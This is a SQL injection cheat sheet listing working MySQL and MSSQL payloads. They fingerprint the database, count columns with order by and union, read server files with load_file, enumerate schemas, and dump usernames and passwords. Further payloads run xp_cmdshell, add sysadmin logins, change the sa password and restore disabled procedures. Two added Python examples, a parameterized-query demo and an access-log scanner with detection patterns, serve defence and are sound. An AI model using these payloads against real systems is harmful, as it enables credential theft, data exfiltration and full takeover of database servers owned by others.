To determine the database type:
Access:
and (select id from msysaccessobjects)>0    => page returns normally: the backend is Access
MSSQL:
and (select id from sysobjects)>0           => page returns normally: the backend is MSSQL
MySQL:
and length(user())>0                        => page returns normally: the backend is MySQL
MySQL:
1. Determine the version: and ord(mid(version(),1,1))>51/*  If the page returns normally the version is 4.0 or higher and union queries can be used.
2. Enumerate the column count with order by: append order by 10/* to the URL; if the page returns normally the query has 10 or more columns.
3. Use union to find the exact column count, e.g. and 1=2 union select 1,2,3,.../*, adding values until the page returns normally; the number of values that works is the exact column count. If spaces are filtered they can be replaced with /**/.
4. Determine whether the database connection account has write permissions: and (select count(*) from mysql.user)>0/*  If this returns an error, all that is left is guessing the administrator account and password.
5. If it returns normally: and 1=2 union select 1,2,3,4,5,6,load_file(char(<ASCII values of the file path, separated by commas>)),8,9,10/*  Note: load_file(char(...)) also accepts the path in hexadecimal; it is used to read configuration files, locate the database connection settings, and so on.
6. Detect whether the account is root: and/**/ord(mid(user(),1,1))=114/*  (114 is the ASCII code of 'r')
7. The built-in function hex() converts characters to hexadecimal, e.g. select hex(user()); unhex() decodes hexadecimal, e.g. select unhex(hex(user()))
8. The built-in function concat() merges multiple columns into one, e.g. select concat(username,0x3a,password) from t_member
9. Commonly used built-in functions:
select system_user()          -- system user
select current_user()         -- current user
select user()                 -- connected user
select version()              -- database version
select database()             -- currently connected database
select @@version_compile_os   -- operating system
select @@datadir              -- data directory path
select @@basedir              -- MySQL installation path
------------------------------------------------------------
Use limit to walk through all rows: the first number selects which row to fetch, the second how many rows to fetch per query. Increase the first number starting from 1; when the browser returns an error at 3, there are 2 databases/tables.
10. Count the databases:
union select concat(schema_name,0x3a) from information_schema.schemata limit <n>,1
11. Enumerate the tables:
union select table_name from information_schema.tables where table_schema=<database name> limit <n>,1
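Why the "returns normally / returns an error" signal that steps 1 to 5 and 10 to 11 rely on exists at all, and how binding parameters removes it, as an added example that is not part of the original cheat sheet. It uses Python's sqlite3 module with a constructed in-memory database (the products and t_member tables and their rows are made up here) as a stand-in for MySQL; the function names are this example's own.

```python
import sqlite3


def build_db():
    # Constructed sample data: a lookup table plus a member table that a UNION
    # SELECT probe would try to read (the cheat sheet's concat(username,0x3a,password) target).
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE products (id INTEGER, name TEXT);
        INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
        CREATE TABLE t_member (username TEXT, password TEXT);
        INSERT INTO t_member VALUES ('admin', 'constructed-secret');
        """
    )
    return db


def lookup_vulnerable(db, product_id):
    # The request parameter is pasted into the SQL text, so "1 and 1=2 union select ..."
    # is parsed as SQL. Every probe on this page depends on exactly this mistake.
    sql = "SELECT id, name FROM products WHERE id=" + product_id
    return db.execute(sql).fetchall()


def lookup_parameterized(db, product_id):
    # The value is bound as data. "1" still matches (the INTEGER column converts it),
    # while an "order by 10" or "union select" payload is just a string that matches no id.
    return db.execute("SELECT id, name FROM products WHERE id=?", (product_id,)).fetchall()


def page_state(lookup, db, product_id):
    # Mimic what the attacker observes: does the page "return normally" or error out?
    # The order-by and union steps of the cheat sheet read nothing but this one bit.
    try:
        lookup(db, product_id)
        return "normal"
    except sqlite3.OperationalError:
        return "error"


if __name__ == "__main__":
    db = build_db()
    union_probe = "1 and 1=2 union select 1, username||':'||password from t_member"
    print("vulnerable, benign  :", lookup_vulnerable(db, "1"))
    print("vulnerable, probe   :", lookup_vulnerable(db, union_probe))
    for n in (2, 3):
        print(f"order by {n} -> vulnerable: {page_state(lookup_vulnerable, db, f'1 order by {n}')},",
              f"parameterized: {page_state(lookup_parameterized, db, f'1 order by {n}')}")
    print("parameterized, probe:", lookup_parameterized(db, union_probe))
```

With the concatenated query, "order by 2" returns normally and "order by 3" errors, which is precisely how step 2 counts columns, and the union payload pulls a t_member row into the product listing. With the bound parameter both probes return normally and nothing leaks, so the attacker's oracle is gone rather than merely filtered.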
MSSQL:
Detect sa (sysadmin) privileges:
and 1=(select is_srvrolemember('sysadmin'));--
Detect db_owner privileges:
and 1=(select is_member('db_owner'))
Enumerate all databases: union select name from master.dbo.sysdatabases where dbid=1   (dbid=1 is the first database)
Enumerate all tables:
First table:  union select top 1 name from <database>.dbo.sysobjects where xtype='U'
Second table: union select top 1 name from <database>.dbo.sysobjects where xtype='U' and name not in ('<first table>')
Third table:  union select top 1 name from <database>.dbo.sysobjects where xtype='U' and name not in ('<first table>','<second table>')
...
Enumerate columns:
Get the table id: select id from seay.dbo.sysobjects where xtype='U' and name='admin'
First column:  select top 1 name from seay.dbo.syscolumns where id=<id>
Second column: select top 1 name from seay.dbo.syscolumns where id=<id> and name not in ('<first column>')
...
Dump data:
select <column name> from <table name>
exec master.dbo.xp_dirtree 'c:\';-- list a directory
exec master.dbo.xp_availablemedia;-- list all current drives
exec master.dbo.xp_subdirs 'c:\';-- list the subdirectories
exec master.dbo.xp_dirtree 'c:\';-- directory tree of all subdirectories
exec master.dbo.xp_cmdshell 'type c:\web\web.config';-- view the contents of a file
Back up the database: backup database <database> to disk='c:/l.asp';
MSSQL built-in functions:
select @@version      -- database version
select user_name()    -- current database connection user name
select db_name()      -- current database name
Change the sa password:
exec sp_password null,'<new password>','sa'
Add a user with sa privileges:
exec sp_addlogin '<username>','<pass>','master';
exec sp_addsrvrolemember '<username>',sysadmin
Detect whether stacked queries (multiple statements) are supported:
;declare @d int;--
Stop or start a service:
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
Unpack a compressed (cab) file:
xp_unpackcab 'c:\test.cab','c:\temp',1
Restore xp_cmdshell:
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
Turn on Jet sandbox mode:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandboxMode','REG_DWORD',1
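A defender's counterpart to the MySQL and MSSQL sections above, added here and not part of the original page: a scanner that flags the probes listed on this page in web-server access logs. The log lines are constructed for this example in Apache combined format, the signature group names, helper functions and thresholds are this example's own, and the patterns are taken from the payloads on this page (order by / union select, information_schema, load_file, mysql.user, sysobjects, syscolumns, sysdatabases, is_srvrolemember, is_member and the xp_* / sp_* procedures).

```python
import re
from urllib.parse import unquote_plus

# Signature groups built from the probes listed on this page (group names are this example's own).
SIGNATURES = {
    "db-fingerprint": r"msysaccessobjects|\bsysobjects\b|\blength\s*\(\s*user\s*\(\s*\)|@@version",
    "mysql-enum": r"information_schema\.(schemata|tables)|load_file\s*\(|mysql\.user|\bmid\s*\(\s*(version|user)\s*\(",
    "mssql-enum": r"is_srvrolemember|\bis_member\s*\(|sysdatabases|syscolumns|xtype\s*=\s*'u'",
    "mssql-xp": r"xp_cmdshell|xp_dirtree|xp_subdirs|xp_availablemedia|xp_regwrite|xp_servicecontrol|"
                r"sp_addextendedproc|sp_addsrvrolemember|sp_addlogin|sp_password",
    "union-probe": r"\border\s+by\s+\d+|\bunion\s+(all\s+)?select\b",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in SIGNATURES.items()}

# Apache combined log format (assumed); only the fields used below are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')


def normalize(query: str) -> str:
    """URL-decode twice (catches double encoding) and undo the /**/ space substitution
    the cheat sheet recommends, so 'order/**/by' is matched like 'order by'."""
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"/\*.*?\*/", " ", decoded)


def scan_request_line(request: str):
    """Return the sorted signature groups matched by one 'METHOD path PROTO' request line."""
    parts = request.split(" ")
    path = parts[1] if len(parts) >= 2 else request
    text = normalize(path.partition("?")[2])
    return sorted(name for name, rx in COMPILED.items() if rx.search(text))


def scan_access_log(lines):
    """Return a list of (ip, status, groups) for every log line whose query string matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        groups = scan_request_line(m.group("req"))
        if groups:
            hits.append((m.group("ip"), m.group("status"), groups))
    return hits


def probing_ips(hits, min_hits=2):
    """Source addresses with at least min_hits matched requests. The enumeration steps on this
    page are long sequences of requests, so repetition from one address is the stronger signal."""
    counts = {}
    for ip, _status, _groups in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= min_hits)


# Constructed log lines (private addresses, made-up timestamps): one benign request
# followed by the probe families listed on this page. load_file's argument is a placeholder.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /item.php?id=1%20and%20ord(mid(version(),1,1))%3E51/* HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /item.php?id=1/**/order/**/by/**/10/* HTTP/1.1" 500 0',
    '10.0.0.9 - - [10/Oct/2023:13:55:43 +0000] "GET /item.php?id=1%20and%201=2%20union%20select%201,2,load_file(0x70617468),4/* HTTP/1.1" 200 9001',
    '192.168.1.20 - - [10/Oct/2023:14:02:10 +0000] "GET /news.asp?id=5%20and%201=(select%20is_srvrolemember(\'sysadmin\'));-- HTTP/1.1" 200 3000',
    '192.168.1.20 - - [10/Oct/2023:14:02:15 +0000] "GET /news.asp?id=5%20union%20select%20top%201%20name%20from%20seay.dbo.sysobjects%20where%20xtype=\'U\' HTTP/1.1" 200 3000',
    '192.168.1.20 - - [10/Oct/2023:14:02:20 +0000] "GET /news.asp?id=5;exec%20master.dbo.xp_cmdshell%20\'dir\';-- HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for ip, status, groups in scan_access_log(SAMPLE_LOG):
        print(ip, status, ", ".join(groups))
    print("probing:", probing_ips(scan_access_log(SAMPLE_LOG)))
```

Decoding before matching matters more than the pattern list: the page's own advice to replace spaces with /**/ defeats a naive "order by" match, and the same goes for percent-encoded or double-encoded payloads. Pair the matches with the response status, since a run of 500s followed by a 200 from one address is the order-by / union column-count walk described in steps 2 and 3.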
Manually injecting common SQL statements